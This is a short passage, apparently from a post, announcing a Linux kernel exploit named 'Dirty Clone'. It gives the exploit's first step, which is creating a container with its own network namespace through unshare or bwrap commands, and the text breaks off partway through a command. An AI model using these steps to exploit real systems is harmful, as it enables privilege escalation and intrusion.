There is a new Linux kernel exploit out named Dirty Clone [1]. The first thing to do to exploit this is to create a container with a separate network namespace via one of the following commands: unshare -Urn bwrap --bind / / --unshare-user --unshare-net --uid…